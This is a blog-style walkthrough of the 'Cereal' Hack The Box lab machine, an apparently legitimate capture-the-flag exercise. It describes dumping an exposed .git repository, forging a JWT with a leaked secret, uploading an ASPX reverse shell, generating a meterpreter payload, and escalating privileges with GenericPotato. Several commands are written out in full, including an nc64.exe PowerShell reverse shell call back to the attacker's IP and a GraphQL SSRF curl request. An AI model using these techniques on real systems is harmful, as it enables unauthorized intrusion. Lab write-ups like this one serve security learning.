In this post, i would like to share walkthrough on Cereal Machine.

This room is been considered difficulty rated as Hard machine

Information Gathering

Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Let’s open the browser and straight into the website interface.

We are directed to a login page.

I have try to login using normal username and password which admin:admin

Let’s see the source code where it might stored something unusual there.

Let’s check the robots.txt if we can find any disallow directory mentioned there.

We need to see what stored subdomain of the machine. We found some server error on the subdomain.

Let’s run the gobuster to see any interesting directory

After a while, i notice there’s a directory called /.git

I’m quite curious about the /.git/ directory and let’s access that directory

Sadly, we found an “403 – Forbidden: Access is denied”

Gaining Access

During my research, i did found a tools such as GitTools can be read over here

You can download the GitTools by running the command git clone https://github.com/internetwache/GitTools.git

We need to create /tmp/git and /tmp/src directory for us to proceed with next step.

Next, let’s run the command GitTools/Dumper/gitdumper.sh https://source.cereal.htb/.git /tmp/git that shown in the screenshot above. However, we get an error saying “/.git/ missing in url which mean that we need to use /.git/ instead of /.git only

It will take a while for it to be completed.

We can extract the downloaded file by execute the command such as GitTools/Extractor/extractor.sh /tmp/git /tmp/src which will extract everything in /tmp/git into /tmp/src

It will take a few second for it to be completed.

Once fully extracted, you can access the /tmp/src in order to see what is stored inside there.

After i have been scroll around the file, i notice there’s a Services Directory that might be useful to us.

There’s a file that called UserService.cs and we need to see what have been written inside in the file

While reading the source code, i notice that there’s secret key that will be useful later on.

We need to start using jwt_tool for those are keen to play with command line.

Maintaining Access

You should be typing those command to get the base64 but sadly for me, i cannot get the base64 hashes within my first try. Keep trying and you will get it

The encoded cookies will look something just like shown in the screenshot above.

We need to upload aspx reverse shell on the machine and let’s find one actual working aspx shell on the internet

An example of the aspx reverse shell can be seen as shown above

We are required to change the String host with our vpn host and int port with the port that we will use for the reverse shell.

After learning the programming with my friends, i have come out with the code above which the function of the code will upload the shell into the machine

On the same directory that stored upload_shell.py and shell.aspx, we will start python listening which look something as above

We also need to start our nc listening

Let’s run the upload_shell.py by execute the command “python3 upload_shell.py”

Let’s check our nc listener, it have return with reverse connection back to us

For us to read the user flag, we need to use windows command “type” which it’s different from linux machine.

Escalate to Root Privileges Access

We need to see any port open and privileges information by using the netstat -aon / findstr /i “listening” and whoami /all

We can use chisel to get port forwarding but i will use msfvenom instead to create a exploit which shown in the screenshot above.

We can use “ls -al” in order to see if the exploit is fully created.

We have to start sudo msfdb run in order to get a shell using metasploit.

We need to execute the command as mentioned below:

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST <your vpn ip>
  • set LPORT <the port that you can key-in during the msfvenom activity>
  • run

On the victim’s machine, you need to create temp directory in order to transfer the exploit there.

For the exploit to run very well, we need to type the command .\temp\<filename of the exploit>

When we check back the metasploit, we have meterpreter shell and we can proceed with that

We can verify the privileges access that been given to us.

We should proceed with portfwd add as the screenshot shown above.

Let’s access the website by surfing using the URL localhost:8081

Nothing that we can use over here.

Let’s see the source code on the website and i notice that website is using graphql

Let’s searchsploit the service and we found nothing there. However, i found that the genericpotate can be exploited within the windows environment

The exploit can be found over here and we are required to download with some modifiation been made on the file

We can start the powershell on the victim’s machine.

We need to access the temp directory in order for the file to be successfully transferred.

We can see that darknite.exe is the only file that stored there for now.

Once we have modification on the file above, it’s adviseable to gather all three file within one folder

We can use “curl” command to replace “wget” command to transfer the file

We can clarify the file have been successfully transferred into the victim’s machine

We need to start the nc listener with the port 1337

On victim’s machine, we need to execute the command “.\GenericPotate.exe -p “C:\temp\nc64.exe” -a “<our VPN IP>:<port> -e powershell” -e HTTP -l 8889″

On the attacker’s machine, we need to execute the command below

curl -k -X “POST” -H “Content-Type: application/json” –data-binary ‘{“query”:”mutation{updatePlant(plantId:2, version:2.2, sourceURL:\”http://localhost:8889\”)}”}’ ‘http://localhost:8081/api/graphql’

When we look back onthe nc listener, we got the connection back to us

Let’s check who are accesing the machine as.

We need to access the C:\Users\Administrator\Desktop in order to look and read the root flag in Windows Environment

The root flag are stored there and we need to execute the command “type root.txt” to get root flag

-THE END-

Happy Learning Guys!

Leave a Reply

Your email address will not be published. Required fields are marked *